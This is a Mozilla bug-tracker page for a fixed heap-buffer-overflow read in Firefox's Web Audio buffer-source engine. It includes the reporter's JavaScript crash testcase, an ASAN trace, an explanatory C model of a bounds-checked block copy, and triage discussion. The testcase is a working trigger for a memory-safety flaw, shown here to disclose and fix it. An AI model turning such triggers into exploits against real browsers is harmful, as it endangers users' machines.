Heap-buffer-overflow READ in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer

RESOLVED FIXED in Firefox 24

Status

Type: defect
Status: RESOLVED FIXED
Reported: 6 years ago
Modified: 3 years ago

People

(Reporter: attekett, Assigned: Ehsan)

Tracking

(4 keywords)

Version: unspecified
Target Milestone: mozilla24
Platform: x86_64 All
Points: ---
Bug Flags:
sec-bounty +
in-testsuite +

Firefox Tracking Flags

(firefox21 unaffected, firefox22+ disabled, firefox23+ disabled, firefox24+ fixed, firefox-esr17 unaffected, b2g18 unaffected)

Details

(Whiteboard: [asan][adv-main24-])

Attachments

(2 attachments)

Reporter

Description

6 years ago
Tested on:

OS: Ubuntu 12.04

Firefox: ASAN opt-build 24.0a1 from 
https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1369217427/ 

Repro-case:

<script>
// Reporter's PoC: start playback of a ~48.5k-frame buffer, then keep
// replacing .buffer with a ~11.3k-frame buffer from a 0 ms timer while
// the node is still playing.
var Context0 = new AudioContext();
var BufferSource6 = Context0.createBufferSource();

setInterval(function () {
    // Replacement buffer: one channel, 11283 frames, sine pattern.
    BufferSource6.buffer = function () {
        var length = 11283;
        var Buffer = Context0.createBuffer(1, length, Context0.sampleRate);
        var bufferData = Buffer.getChannelData(0);
        for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i * 624); }
        return Buffer;
    }();
}, 0);

// start(when, offset, duration): the playback window is set before the
// larger initial buffer is even assigned.
BufferSource6.start(0.15831333969254047, 0.23571860056836158, 0.529235512483865);

// Initial buffer: one channel, 48517 frames, sine pattern.
BufferSource6.buffer = function () {
    var length = 48517;
    var Buffer = Context0.createBuffer(1, length, Context0.sampleRate);
    var bufferData = Buffer.getChannelData(0);
    for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i * 365); }
    return Buffer;
}();
</script>


ASAN-report:

==31496== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f44ca227118 at pc 0x7f44f856318d bp 0x7f44d0c10070 sp 0x7f44d0c10068
READ of size 1 at 0x7f44ca227118 thread T26
    #0 0x7f44f856318c in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer(mozilla::AudioChunk*, unsigned int, unsigned long, unsigned long, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:172
    #1 0x7f44f856171f in mozilla::dom::AudioBufferSourceNodeEngine::ProduceAudioBlock(mozilla::AudioNodeStream*, mozilla::AudioChunk const&, mozilla::AudioChunk*, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:392
    #2 0x7f44f84d117e in mozilla::AudioNodeStream::ProduceOutput(long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/AudioNodeStream.cpp:411
    #3 0x7f44f853ec83 in mozilla::MediaStreamGraphImpl::ProduceDataForStreamsBlockByBlock(unsigned int, long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:937
    #4 0x7f44f8550e05 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:1163
    #5 0x7f44fabe2212 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
.
.
.
OS: Linux → All
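What the testcase sets up is a playback window (offset 0.2357 s, duration 0.529 s) computed while a 48517-frame buffer is installed, after which a much shorter 11283-frame buffer is swapped in from the main thread while the graph thread keeps rendering 128-frame blocks. The real analysis lives in bug 874934 and is not reproduced here; the following is an added model of that failure class, not Gecko code, showing the invariant a block copy has to enforce: validate the read position against the buffer installed *now*, every block, rather than trusting a window computed for an earlier buffer. The 48000 Hz sample rate, the struct layout and all function names are assumptions of this example.

```c
/* Hypothetical model, not Gecko code: a block-rendering engine whose playback
 * window (position + frames remaining) was computed for one buffer and which
 * is then handed a shorter replacement buffer, as the testcase does. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BLOCK_FRAMES 128u          /* Web Audio renders 128-frame blocks */

struct Engine {
    const float *buf;    /* currently installed buffer; swappable at any time */
    uint32_t len;        /* frames in buf */
    uint32_t pos;        /* next frame to read */
    uint32_t remaining;  /* frames left in the start(offset, duration) window */
};

struct ScenarioResult {
    uint32_t first_block;   /* frames copied before the swap */
    uint32_t overshoot;     /* frames the stale window extends past the new buffer */
    uint32_t second_block;  /* frames copied after the swap */
    float tail_sample;      /* last output sample after the swap (expect silence) */
};

static uint32_t seconds_to_frames(double seconds, uint32_t rate)
{
    return (uint32_t)(seconds * rate);
}

static void engine_init(struct Engine *e, const float *buf, uint32_t len,
                        uint32_t offset_frames, uint32_t duration_frames)
{
    e->buf = buf;
    e->len = len;
    e->pos = offset_frames;
    e->remaining = duration_frames;
}

/* The swap only replaces the data; pos/remaining still describe the old
 * buffer. That stale state is what an unchecked reader must not trust. */
static void engine_set_buffer(struct Engine *e, const float *buf, uint32_t len)
{
    e->buf = buf;
    e->len = len;
}

/* Frames by which a window [pos, pos+remaining) runs past a buffer of `len`
 * frames. An unchecked copy would read that many frames out of bounds over
 * the rest of the window. */
static uint32_t window_overshoot(uint32_t pos, uint32_t remaining, uint32_t len)
{
    uint64_t end = (uint64_t)pos + remaining;
    return end > len ? (uint32_t)(end - len) : 0;
}

/* Bounds-checked block copy: copies only frames that exist in the buffer
 * installed now, zero-fills the rest of the block, and returns the frames
 * copied. The window still advances, so a stale position becomes silence,
 * never a read. */
static uint32_t copy_block_checked(struct Engine *e, float *out)
{
    uint32_t want  = e->remaining < BLOCK_FRAMES ? e->remaining : BLOCK_FRAMES;
    uint32_t avail = e->pos < e->len ? e->len - e->pos : 0;
    uint32_t n     = want < avail ? want : avail;
    if (n) memcpy(out, e->buf + e->pos, n * sizeof *out);
    memset(out + n, 0, (BLOCK_FRAMES - n) * sizeof *out);
    e->pos += n;
    e->remaining -= want;
    return n;
}

/* Scenario shaped like the testcase: window from start(_, 0.2357, 0.5292)
 * computed for a 48517-frame buffer, then an 11283-frame buffer installed.
 * The 48000 Hz rate and the buffer contents are constructed assumptions. */
static struct ScenarioResult run_testcase_scenario(void)
{
    static float big[48517], small[11283];
    float out[BLOCK_FRAMES];
    struct ScenarioResult r;
    struct Engine e;
    for (uint32_t i = 0; i < 48517; i++) big[i] = (float)i;
    for (uint32_t i = 0; i < 11283; i++) small[i] = -(float)i;

    engine_init(&e, big, 48517,
                seconds_to_frames(0.23571860056836158, 48000),   /* 11314 */
                seconds_to_frames(0.529235512483865, 48000));    /* 25403 */
    r.first_block  = copy_block_checked(&e, out);    /* 128: still inside big */
    engine_set_buffer(&e, small, 11283);             /* main-thread .buffer assignment */
    r.overshoot    = window_overshoot(e.pos, e.remaining, e.len);
    r.second_block = copy_block_checked(&e, out);    /* 0: pos already past new end */
    r.tail_sample  = out[BLOCK_FRAMES - 1];
    return r;
}

int main(void)
{
    struct ScenarioResult r = run_testcase_scenario();
    printf("before swap: %u frames copied\n", r.first_block);
    printf("after swap: stale window overshoots the new buffer by %u frames; "
           "checked copy returned %u frames, tail sample %.1f\n",
           r.overshoot, r.second_block, r.tail_sample);
    return 0;
}
```

The point of the model is the check in copy_block_checked: `avail` is derived from `e->len` at copy time, so a buffer swap between blocks can only shorten what gets copied. Clamping once at start() is not enough, because the buffer the window was computed against can be replaced by the main thread at any moment afterwards.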
Assignee

Updated

6 years ago
Blocks: webaudio
Assignee

Comment 1

6 years ago
Posted file Testcase
Assignee

Updated

6 years ago
Attachment #752781 - Attachment mime type: text/plain → text/html
Assignee

Updated

6 years ago
Duplicate of this bug: 874934
Assignee

Comment 3

6 years ago
For the analysis, see bug 874934.
Assignee

Comment 4

6 years ago
Posted patch Patch (v1)
Assignee: nobody → ehsan
Status: NEW → ASSIGNED
Attachment #752894 - Flags: review?(roc)
Assignee

Updated

6 years ago
Blocks: 875617
https://hg.mozilla.org/mozilla-central/rev/04d09d48a9f1
Status: ASSIGNED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla24
Flags: sec-bounty?
See Also: → 878478
Comment 9 (Daniel Veditz [:dveditz])

WebAudio is disabled in Firefox 22 and 23, correct?
Flags: sec-bounty? → sec-bounty+
Comment 10 (Al Billings [:abillings])

This should have gone through sec-approval before going in if it isn't disabled based on earlier comments and the rating.

https://wiki.mozilla.org/Security/Bug_Approval_Process

We'll need to take this on Aurora and Beta now to make sure we don't ship it if it isn't disabled by default. Please nominate patches for those branches. What are the risks associated with doing so? Will the existing patch apply?
Whiteboard: [asan]
Assignee

Comment 11

6 years ago
(In reply to Daniel Veditz [:dveditz] from comment #9)
> WebAudio is disabled in Firefox 22 and 23, correct?

Like all Web Audio bugs, it affects trunk, and 23, until 23 goes to beta.

(In reply to Al Billings [:abillings] from comment #10)
> We'll need to take this on Aurora and Beta now to make sure we don't ship it
> if it isn't disabled by default. Please nominate patches for those branches.
> What are the risks associated with doing so? Will the existing patch apply?

This is not needed on Beta since Web Audio is disabled there.  And it will be disabled on 23 once it gets to release.  Most if not all of these security bugs are relatively low-risk but there is some effort involved in uplifting them all to Aurora, and I'm not sure if we need to do that since we know that 23 will not ship Web Audio...
Assignee

Comment 12

6 years ago
Mass moving Web Audio bugs to the Web Audio component.  Filter on duckityduck.
Component: Video/Audio → Web Audio
Whiteboard: [asan] → [asan][adv-main24-]
Flags: in-testsuite?
Flags: in-testsuite? → in-testsuite+
Group: core-security